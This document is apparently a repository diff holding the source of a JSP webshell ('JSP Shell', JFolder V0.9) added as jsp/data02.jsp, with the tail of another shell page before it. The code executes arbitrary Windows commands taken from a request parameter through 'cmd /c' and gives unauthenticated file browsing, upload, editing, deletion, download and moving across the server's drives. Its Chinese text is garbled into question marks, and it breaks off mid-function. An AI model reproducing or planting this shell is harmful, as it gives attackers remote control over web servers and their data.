||||
else if (document.getElementById)
|
||||
window.onload=do_onload
|
||||
|
||||
|
||||
|
||||
</script>
|
||||
<script language="javascript">
|
||||
|
||||
function doForm(action,path,file,cmd,tab,content)
|
||||
{
|
||||
document.frmCqq.action.value=action;
|
||||
document.frmCqq.path.value=path;
|
||||
document.frmCqq.file.value=file;
|
||||
document.frmCqq.cmd.value=cmd;
|
||||
document.frmCqq.tabID.value=tab;
|
||||
document.frmCqq.content.value=content;
|
||||
if(action=="del")
|
||||
{
|
||||
if(confirm("?·?¨?????????? "+file+" ????"))
|
||||
document.frmCqq.submit();
|
||||
}
|
||||
else
|
||||
{
|
||||
document.frmCqq.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
|
||||
<title>JSP Shell ·?°??????ú</title>
|
||||
<head>
|
||||
|
||||
|
||||
<body>
|
||||
|
||||
<form name="frmCqq" method="post" action="">
|
||||
<input type="hidden" name="action" value="">
|
||||
<input type="hidden" name="path" value="">
|
||||
<input type="hidden" name="file" value="">
|
||||
<input type="hidden" name="cmd" value="">
|
||||
<input type="hidden" name="tabID" value="2">
|
||||
<input type="hidden" name="content" value="">
|
||||
</form>
|
||||
|
||||
<!--Top Menu Started-->
|
||||
<ul id="tablist">
|
||||
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
|
||||
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
|
||||
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
|
||||
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
|
||||
<%=authorInfo[languageNo]%>
|
||||
</ul>
|
||||
<!--Top Menu End-->
|
||||
|
||||
|
||||
<%
|
||||
StringBuffer sbFolder=new StringBuffer("");
|
||||
StringBuffer sbFile=new StringBuffer("");
|
||||
try
|
||||
{
|
||||
File objFile = new File(strDir);
|
||||
File list[] = objFile.listFiles();
|
||||
if(objFile.getAbsolutePath().length()>3)
|
||||
{
|
||||
sbFolder.append("<tr><td > </td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
|
||||
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
|
||||
|
||||
|
||||
}
|
||||
for(int i=0;i<list.length;i++)
|
||||
{
|
||||
if(list[i].isDirectory())
|
||||
{
|
||||
sbFolder.append("<tr><td > </td><td>");
|
||||
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
|
||||
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
|
||||
}
|
||||
else
|
||||
{
|
||||
String strLen="";
|
||||
String strDT="";
|
||||
long lFile=0;
|
||||
lFile=list[i].length();
|
||||
strLen = convertFileSize(lFile);
|
||||
Date dt=new Date(list[i].lastModified());
|
||||
strDT=dt.toLocaleString();
|
||||
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
|
||||
sbFile.append(""+list[i].getName());
|
||||
sbFile.append("</td><td>");
|
||||
sbFile.append(""+strLen);
|
||||
sbFile.append("</td><td>");
|
||||
sbFile.append(""+strDT);
|
||||
sbFile.append("</td><td>");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileEdit[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileDel[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileDown[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileCopy[languageNo]+"</a> ");
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
out.println("<font color=red>??×÷?§°??? "+e.toString()+"</font>");
|
||||
}
|
||||
%>
|
||||
|
||||
<DIV id="tabcontentcontainer">
|
||||
|
||||
|
||||
<div id="menu3" class="tabcontent">
|
||||
<br>
|
||||
<br> ???ê??
|
||||
<br>
|
||||
<br>
|
||||
|
||||
</div>
|
||||
|
||||
<div id="menu4" class="tabcontent">
|
||||
<br>
|
||||
<p>???????????÷</p>
|
||||
<p> jsp °?±??????????í?÷???¨???????ò???????????í·????÷???????????????ú???????¨????????</p>
|
||||
<p>??????????????????????????windows?????????á?????ü?????°?????????????????????????ò???à??</p>
|
||||
<p>??windows??cmd??</p>
|
||||
<p> </p>
|
||||
<p>????????</p>
|
||||
<p> <b>???ó?????????????????????????????????ò???¨?é??????????????????±??????????ò?ü???ê???????¨??<p>
|
||||
???????·????<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
|
||||
<p> </p>
|
||||
<p>?????ü??????</p>
|
||||
<p> 2004.11.15 V0.9????°?·????????????????ù±?????????????±à?????????????????????????????°???¨????????????</p>
|
||||
<p> 2004.10.27 ???±?¨??0.6°?°??? ?á???????????????????? ?? cmd????</p>
|
||||
<p> 2004.09.20 ??????jsp ???ò?????????ò???????????????????????ò</p>
|
||||
<p> </p>
|
||||
<p> </p>
|
||||
</div>
|
||||
|
||||
|
||||
<div id="menu1" class="tabcontent">
|
||||
<%
|
||||
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"?? <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
|
||||
%>
|
||||
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
|
||||
|
||||
<tr>
|
||||
<td width="25%" align="center" valign="top">
|
||||
<table width="98%" border="0" cellspacing="0" cellpadding="3">
|
||||
<%=sbFolder%>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="81%" align="left" valign="top">
|
||||
|
||||
<%
|
||||
if(strAction!=null && strAction.equals("edit"))
|
||||
{
|
||||
out.println(sbEdit.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("copy"))
|
||||
{
|
||||
out.println(sbCopy.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("down"))
|
||||
{
|
||||
out.println(sbDown.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("savecopy"))
|
||||
{
|
||||
out.println(sbSaveCopy.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
|
||||
{
|
||||
out.println(sbNewFile.toString());
|
||||
}
|
||||
else
|
||||
{
|
||||
%>
|
||||
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
|
||||
<tr bgcolor="#E7e7e6">
|
||||
<td width="26%"><%=strFileName[languageNo]%></td>
|
||||
<td width="19%"><%=strFileSize[languageNo]%></td>
|
||||
<td width="29%"><%=strLastModified[languageNo]%></td>
|
||||
<td width="26%"><%=strFileOperation[languageNo]%></td>
|
||||
</tr>
|
||||
<%=sbFile%>
|
||||
<!-- <tr align="center">
|
||||
<td colspan="4"><br>
|
||||
×?????????????<font color="#FF0000">30</font> ???ó????<font color="#FF0000">664.9</font>
|
||||
KB </td>
|
||||
</tr>
|
||||
-->
|
||||
</table>
|
||||
</span>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
<form name="frmMake" action="" method="post">
|
||||
<tr><td colspan=2 bgcolor=#FBFFC6>
|
||||
<input type="hidden" name="action" value="newFile">
|
||||
<input type="hidden" name="path" value="<%=strDir%>">
|
||||
<input type="hidden" name="file" value="<%=strFile%>">
|
||||
<input type="hidden" name="cmd" value="<%=strCmd%>">
|
||||
<input type="hidden" name="tabID" value="1">
|
||||
<input type="hidden" name="content" value="">
|
||||
<%
|
||||
if(!strDir.endsWith("\\"))
|
||||
strDir = strDir + "\\";
|
||||
%>
|
||||
<input type="text" name="fileName" size=36 value="<%=strDir%>">
|
||||
<input type="submit" name="btnNewFile" value="???¨????" onclick="frmMake.submit()" >
|
||||
<input type="submit" name="btnNewDir" value="???¨????" onclick="frmMake.submit()" >
|
||||
</form>
|
||||
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
|
||||
<input type="hidden" name="action" value="upload">
|
||||
<input type="hidden" name="path" value="<%=strDir%>">
|
||||
<input type="hidden" name="file" value="<%=strFile%>">
|
||||
<input type="hidden" name="cmd" value="<%=strCmd%>">
|
||||
<input type="hidden" name="tabID" value="1">
|
||||
<input type="hidden" name="content" value="">
|
||||
<input type="file" name="cqqUploadFile" size="36">
|
||||
<input type="submit" name="submit" value="????">
|
||||
</td></tr></form>
|
||||
</table>
|
||||
</div>
|
||||
<div id="menu2" class="tabcontent">
|
||||
|
||||
<%
|
||||
String line="";
|
||||
StringBuffer sbCmd=new StringBuffer("");
|
||||
|
||||
if(strCmd!=null)
|
||||
{
|
||||
try
|
||||
{
|
||||
//out.println(strCmd);
|
||||
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
while((line=br.readLine())!=null)
|
||||
{
|
||||
sbCmd.append(line+"\r\n");
|
||||
}
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
System.out.println(e.toString());
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
strCmd = "set";
|
||||
}
|
||||
|
||||
%>
|
||||
<form name="cmd" action="" method="post">
|
||||
|
||||
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
|
||||
<input type="hidden" name="tabID" value="2">
|
||||
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
|
||||
</form>
|
||||
<%
|
||||
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
|
||||
{
|
||||
%>
|
||||
<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
|
||||
<br>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
</DIV>
|
||||
</div>
|
||||
<br><br>
|
||||
<center><a href="http://www.wooyun.org/" target="_blank">http://www.WooYun.org/</a> ,All Rights Reserved.
|
||||
<br>Email:121208099#qq.com
|
993
jsp/data02.jsp
Normal file
993
jsp/data02.jsp
Normal file
|
@ -0,0 +1,993 @@
|
|||
<%
|
||||
/**
|
||||
JFolder V0.9 windows platform
|
||||
@Filename?? JFolder.jsp
|
||||
@Description?? ?????ò???????????????????????ò???à????×??????í?÷???á???ù±?????????×÷????????????????
|
||||
|
||||
@Bugs : ?????±??????????????·¨????????
|
||||
*/
|
||||
%>
|
||||
<%@ page contentType="text/html;charset=gb2312"%>
|
||||
<%@page import="java.io.*,java.util.*,java.net.*" %>
|
||||
<%!
|
||||
private final static int languageNo=0; //????°?±???0 : ?????? 1??????
|
||||
String strThisFile="JFolder.jsp";
|
||||
String[] authorInfo={" <font color=red> °??????ú </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
|
||||
String[] strFileManage = {"?? ?? ?? ?í","File Management"};
|
||||
String[] strCommand = {"CMD ?ü ??","Command Window"};
|
||||
String[] strSysProperty = {"?? ?? ?? ??","System Property"};
|
||||
String[] strHelp = {"°? ?ú","Help"};
|
||||
String[] strParentFolder = {"????????","Parent Folder"};
|
||||
String[] strCurrentFolder= {"?±?°????","Current Folder"};
|
||||
String[] strDrivers = {"?????÷","Drivers"};
|
||||
String[] strFileName = {"????????","File Name"};
|
||||
String[] strFileSize = {"?????ó??","File Size"};
|
||||
String[] strLastModified = {"×??ó????","Last Modified"};
|
||||
String[] strFileOperation= {"??????×÷","Operations"};
|
||||
String[] strFileEdit = {"????","Edit"};
|
||||
String[] strFileDown = {"????","Download"};
|
||||
String[] strFileCopy = {"????","Move"};
|
||||
String[] strFileDel = {"????","Delete"};
|
||||
String[] strExecute = {"????","Execute"};
|
||||
String[] strBack = {"·???","Back"};
|
||||
String[] strFileSave = {"±???","Save"};
|
||||
|
||||
public class FileHandler
|
||||
{
|
||||
private String strAction="";
|
||||
private String strFile="";
|
||||
void FileHandler(String action,String f)
|
||||
{
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
public static class UploadMonitor {
|
||||
|
||||
static Hashtable uploadTable = new Hashtable();
|
||||
|
||||
static void set(String fName, UplInfo info) {
|
||||
uploadTable.put(fName, info);
|
||||
}
|
||||
|
||||
static void remove(String fName) {
|
||||
uploadTable.remove(fName);
|
||||
}
|
||||
|
||||
static UplInfo getInfo(String fName) {
|
||||
UplInfo info = (UplInfo) uploadTable.get(fName);
|
||||
return info;
|
||||
}
|
||||
}
|
||||
|
||||
public class UplInfo {
|
||||
|
||||
public long totalSize;
|
||||
public long currSize;
|
||||
public long starttime;
|
||||
public boolean aborted;
|
||||
|
||||
public UplInfo() {
|
||||
totalSize = 0l;
|
||||
currSize = 0l;
|
||||
starttime = System.currentTimeMillis();
|
||||
aborted = false;
|
||||
}
|
||||
|
||||
public UplInfo(int size) {
|
||||
totalSize = size;
|
||||
currSize = 0;
|
||||
starttime = System.currentTimeMillis();
|
||||
aborted = false;
|
||||
}
|
||||
|
||||
public String getUprate() {
|
||||
long time = System.currentTimeMillis() - starttime;
|
||||
if (time != 0) {
|
||||
long uprate = currSize * 1000 / time;
|
||||
return convertFileSize(uprate) + "/s";
|
||||
}
|
||||
else return "n/a";
|
||||
}
|
||||
|
||||
public int getPercent() {
|
||||
if (totalSize == 0) return 0;
|
||||
else return (int) (currSize * 100 / totalSize);
|
||||
}
|
||||
|
||||
public String getTimeElapsed() {
|
||||
long time = (System.currentTimeMillis() - starttime) / 1000l;
|
||||
if (time - 60l >= 0){
|
||||
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
|
||||
else return time / 60 + ":0" + (time % 60) + "m";
|
||||
}
|
||||
else return time<10 ? "0" + time + "s": time + "s";
|
||||
}
|
||||
|
||||
public String getTimeEstimated() {
|
||||
if (currSize == 0) return "n/a";
|
||||
long time = System.currentTimeMillis() - starttime;
|
||||
time = totalSize * time / currSize;
|
||||
time /= 1000l;
|
||||
if (time - 60l >= 0){
|
||||
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
|
||||
else return time / 60 + ":0" + (time % 60) + "m";
|
||||
}
|
||||
else return time<10 ? "0" + time + "s": time + "s";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
public class FileInfo {
|
||||
|
||||
public String name = null, clientFileName = null, fileContentType = null;
|
||||
private byte[] fileContents = null;
|
||||
public File file = null;
|
||||
public StringBuffer sb = new StringBuffer(100);
|
||||
|
||||
public void setFileContents(byte[] aByteArray) {
|
||||
fileContents = new byte[aByteArray.length];
|
||||
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
|
||||
}
|
||||
}
|
||||
|
||||
// A Class with methods used to process a ServletInputStream
|
||||
public class HttpMultiPartParser {
|
||||
|
||||
private final String lineSeparator = System.getProperty("line.separator", "\n");
|
||||
private final int ONE_MB = 1024 * 1;
|
||||
|
||||
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
|
||||
int clength) throws IllegalArgumentException, IOException {
|
||||
if (is == null) throw new IllegalArgumentException("InputStream");
|
||||
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
|
||||
"\"" + boundary + "\" is an illegal boundary indicator");
|
||||
boundary = "--" + boundary;
|
||||
StringTokenizer stLine = null, stFields = null;
|
||||
FileInfo fileInfo = null;
|
||||
Hashtable dataTable = new Hashtable(5);
|
||||
String line = null, field = null, paramName = null;
|
||||
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
|
||||
boolean isFile = false;
|
||||
if (saveFiles) { // Create the required directory (including parent dirs)
|
||||
File f = new File(saveInDir);
|
||||
f.mkdirs();
|
||||
}
|
||||
line = getLine(is);
|
||||
if (line == null || !line.startsWith(boundary)) throw new IOException(
|
||||
"Boundary not found; boundary = " + boundary + ", line = " + line);
|
||||
while (line != null) {
|
||||
if (line == null || !line.startsWith(boundary)) return dataTable;
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
stLine = new StringTokenizer(line, ";\r\n");
|
||||
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
line = stLine.nextToken().toLowerCase();
|
||||
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
|
||||
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in second line");
|
||||
fileInfo = new FileInfo();
|
||||
stFields.nextToken();
|
||||
paramName = stFields.nextToken();
|
||||
isFile = false;
|
||||
if (stLine.hasMoreTokens()) {
|
||||
field = stLine.nextToken();
|
||||
stFields = new StringTokenizer(field, "=\"");
|
||||
if (stFields.countTokens() > 1) {
|
||||
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
|
||||
fileInfo.name = paramName;
|
||||
String value = stFields.nextToken();
|
||||
if (value != null && value.trim().length() > 0) {
|
||||
fileInfo.clientFileName = value;
|
||||
isFile = true;
|
||||
}
|
||||
else {
|
||||
line = getLine(is); // Skip "Content-Type:" line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Position to boundary line
|
||||
continue;
|
||||
}
|
||||
}
|
||||
}
|
||||
else if (field.toLowerCase().indexOf("filename") >= 0) {
|
||||
line = getLine(is); // Skip "Content-Type:" line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Skip blank line
|
||||
line = getLine(is); // Position to boundary line
|
||||
continue;
|
||||
}
|
||||
}
|
||||
boolean skipBlankLine = true;
|
||||
if (isFile) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
if (line.trim().length() < 1) skipBlankLine = false;
|
||||
else {
|
||||
stLine = new StringTokenizer(line, ": ");
|
||||
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
|
||||
"Bad data in third line");
|
||||
stLine.nextToken(); // Content-Type
|
||||
fileInfo.fileContentType = stLine.nextToken();
|
||||
}
|
||||
}
|
||||
if (skipBlankLine) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
}
|
||||
if (!isFile) {
|
||||
line = getLine(is);
|
||||
if (line == null) return dataTable;
|
||||
dataTable.put(paramName, line);
|
||||
// If parameter is dir, change saveInDir to dir
|
||||
if (paramName.equals("dir")) saveInDir = line;
|
||||
line = getLine(is);
|
||||
continue;
|
||||
}
|
||||
try {
|
||||
UplInfo uplInfo = new UplInfo(clength);
|
||||
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
|
||||
OutputStream os = null;
|
||||
String path = null;
|
||||
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
|
||||
fileInfo.clientFileName));
|
||||
else os = new ByteArrayOutputStream(ONE_MB);
|
||||
boolean readingContent = true;
|
||||
byte previousLine[] = new byte[2 * ONE_MB];
|
||||
byte temp[] = null;
|
||||
byte currentLine[] = new byte[2 * ONE_MB];
|
||||
int read, read3;
|
||||
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
|
||||
line = null;
|
||||
break;
|
||||
}
|
||||
while (readingContent) {
|
||||
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
|
||||
line = null;
|
||||
uplInfo.aborted = true;
|
||||
break;
|
||||
}
|
||||
if (compareBoundary(boundary, currentLine)) {
|
||||
os.write(previousLine, 0, read - 2);
|
||||
line = new String(currentLine, 0, read3);
|
||||
break;
|
||||
}
|
||||
else {
|
||||
os.write(previousLine, 0, read);
|
||||
uplInfo.currSize += read;
|
||||
temp = currentLine;
|
||||
currentLine = previousLine;
|
||||
previousLine = temp;
|
||||
read = read3;
|
||||
}//end else
|
||||
}//end while
|
||||
os.flush();
|
||||
os.close();
|
||||
if (!saveFiles) {
|
||||
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
|
||||
fileInfo.setFileContents(baos.toByteArray());
|
||||
}
|
||||
else fileInfo.file = new File(path);
|
||||
dataTable.put(paramName, fileInfo);
|
||||
uplInfo.currSize = uplInfo.totalSize;
|
||||
}//end try
|
||||
catch (IOException e) {
|
||||
throw e;
|
||||
}
|
||||
}
|
||||
return dataTable;
|
||||
}
|
||||
|
||||
/**
|
||||
* Compares boundary string to byte array
|
||||
*/
|
||||
private boolean compareBoundary(String boundary, byte ba[]) {
|
||||
byte b;
|
||||
if (boundary == null || ba == null) return false;
|
||||
for (int i = 0; i < boundary.length(); i++)
|
||||
if ((byte) boundary.charAt(i) != ba[i]) return false;
|
||||
return true;
|
||||
}
|
||||
|
||||
/** Convenience method to read HTTP header lines */
|
||||
private synchronized String getLine(ServletInputStream sis) throws IOException {
|
||||
byte b[] = new byte[1024];
|
||||
int read = sis.readLine(b, 0, b.length), index;
|
||||
String line = null;
|
||||
if (read != -1) {
|
||||
line = new String(b, 0, read);
|
||||
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
|
||||
}
|
||||
return line;
|
||||
}
|
||||
|
||||
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
|
||||
String path = null;
|
||||
if (dir == null || fileName == null) throw new IllegalArgumentException(
|
||||
"dir or fileName is null");
|
||||
int index = fileName.lastIndexOf('/');
|
||||
String name = null;
|
||||
if (index >= 0) name = fileName.substring(index + 1);
|
||||
else name = fileName;
|
||||
index = name.lastIndexOf('\\');
|
||||
if (index >= 0) fileName = name.substring(index + 1);
|
||||
path = dir + File.separator + fileName;
|
||||
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
|
||||
else return path.replace('/', File.separatorChar);
|
||||
}
|
||||
} //End of class HttpMultiPartParser
|
||||
|
||||
String formatPath(String p)
|
||||
{
|
||||
StringBuffer sb=new StringBuffer();
|
||||
for (int i = 0; i < p.length(); i++)
|
||||
{
|
||||
if(p.charAt(i)=='\\')
|
||||
{
|
||||
sb.append("\\\\");
|
||||
}
|
||||
else
|
||||
{
|
||||
sb.append(p.charAt(i));
|
||||
}
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
|
||||
/**
|
||||
* Converts some important chars (int) to the corresponding html string
|
||||
*/
|
||||
static String conv2Html(int i) {
|
||||
if (i == '&') return "&";
|
||||
else if (i == '<') return "<";
|
||||
else if (i == '>') return ">";
|
||||
else if (i == '"') return """;
|
||||
else return "" + (char) i;
|
||||
}
|
||||
|
||||
/**
|
||||
* Converts a normal string to a html conform string
|
||||
*/
|
||||
static String htmlEncode(String st) {
|
||||
StringBuffer buf = new StringBuffer();
|
||||
for (int i = 0; i < st.length(); i++) {
|
||||
buf.append(conv2Html(st.charAt(i)));
|
||||
}
|
||||
return buf.toString();
|
||||
}
|
||||
String getDrivers()
|
||||
/**
|
||||
Windows?????????????????ù????????
|
||||
*/
|
||||
{
|
||||
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
|
||||
File roots[]=File.listRoots();
|
||||
for(int i=0;i<roots.length;i++)
|
||||
{
|
||||
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
|
||||
sb.append(roots[i]+"</a> ");
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
static String convertFileSize(long filesize)
|
||||
{
|
||||
//bug 5.09M ????5.9M
|
||||
String strUnit="Bytes";
|
||||
String strAfterComma="";
|
||||
int intDivisor=1;
|
||||
if(filesize>=1024*1024)
|
||||
{
|
||||
strUnit = "MB";
|
||||
intDivisor=1024*1024;
|
||||
}
|
||||
else if(filesize>=1024)
|
||||
{
|
||||
strUnit = "KB";
|
||||
intDivisor=1024;
|
||||
}
|
||||
if(intDivisor==1) return filesize + " " + strUnit;
|
||||
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
|
||||
if(strAfterComma=="") strAfterComma=".0";
|
||||
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
|
||||
}
|
||||
%>
|
||||
<%
|
||||
request.setCharacterEncoding("gb2312");
|
||||
String tabID = request.getParameter("tabID");
|
||||
String strDir = request.getParameter("path");
|
||||
String strAction = request.getParameter("action");
|
||||
String strFile = request.getParameter("file");
|
||||
String strPath = strDir + "\\" + strFile;
|
||||
String strCmd = request.getParameter("cmd");
|
||||
StringBuffer sbEdit=new StringBuffer("");
|
||||
StringBuffer sbDown=new StringBuffer("");
|
||||
StringBuffer sbCopy=new StringBuffer("");
|
||||
StringBuffer sbSaveCopy=new StringBuffer("");
|
||||
StringBuffer sbNewFile=new StringBuffer("");
|
||||
|
||||
if((tabID==null) || tabID.equals(""))
|
||||
{
|
||||
tabID = "1";
|
||||
}
|
||||
|
||||
if(strDir==null||strDir.length()<1)
|
||||
{
|
||||
strDir = request.getRealPath("/");
|
||||
}
|
||||
|
||||
|
||||
if(strAction!=null && strAction.equals("down"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
if(f.length()==0)
|
||||
{
|
||||
sbDown.append("?????ó???? 0 ×???????????????°?");
|
||||
}
|
||||
else
|
||||
{
|
||||
response.setHeader("content-type","text/html; charset=ISO-8859-1");
|
||||
response.setContentType("APPLICATION/OCTET-STREAM");
|
||||
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
|
||||
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
|
||||
out.clearBuffer();
|
||||
int i;
|
||||
while ((i=fileInputStream.read()) != -1)
|
||||
{
|
||||
out.write(i);
|
||||
}
|
||||
fileInputStream.close();
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("del"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
f.delete();
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("edit"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
|
||||
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
|
||||
sbEdit.append("<input type=hidden name=action value=save >\r\n");
|
||||
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
|
||||
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
|
||||
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
|
||||
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> "+strPath+"\r\n");
|
||||
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
|
||||
String line="";
|
||||
while((line=br.readLine())!=null)
|
||||
{
|
||||
sbEdit.append(htmlEncode(line)+"\r\n");
|
||||
}
|
||||
sbEdit.append("</textarea>");
|
||||
sbEdit.append("<input type=hidden name=path value="+strDir+">");
|
||||
sbEdit.append("</form>");
|
||||
}
|
||||
|
||||
if(strAction!=null && strAction.equals("save"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
|
||||
String strContent=request.getParameter("content");
|
||||
bw.write(strContent);
|
||||
bw.close();
|
||||
}
|
||||
if(strAction!=null && strAction.equals("copy"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
|
||||
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
|
||||
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
|
||||
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
|
||||
sbCopy.append("?????????? "+strPath+"<p>");
|
||||
sbCopy.append("??±ê?????? <input type=text name=file2 size=40 value='"+strDir+"'><p>");
|
||||
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
|
||||
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p> \r\n");
|
||||
sbCopy.append("</form>");
|
||||
}
|
||||
if(strAction!=null && strAction.equals("savecopy"))
|
||||
{
|
||||
File f=new File(strPath);
|
||||
String strDesFile=request.getParameter("file2");
|
||||
if(strDesFile==null || strDesFile.equals(""))
|
||||
{
|
||||
sbSaveCopy.append("<p><font color=red>??±ê?????í?ó??</font>");
|
||||
}
|
||||
else
|
||||
{
|
||||
File f_des=new File(strDesFile);
|
||||
if(f_des.isFile())
|
||||
{
|
||||
sbSaveCopy.append("<p><font color=red>??±ê??????????,??????????</font>");
|
||||
}
|
||||
else
|
||||
{
|
||||
String strTmpFile=strDesFile;
|
||||
if(f_des.isDirectory())
|
||||
{
|
||||
if(!strDesFile.endsWith("\\"))
|
||||
{
|
||||
strDesFile=strDesFile+"\\";
|
||||
}
|
||||
strTmpFile=strDesFile+"cqq_"+strFile;
|
||||
}
|
||||
|
||||
File f_des_copy=new File(strTmpFile);
|
||||
FileInputStream in1=new FileInputStream(f);
|
||||
FileOutputStream out1=new FileOutputStream(f_des_copy);
|
||||
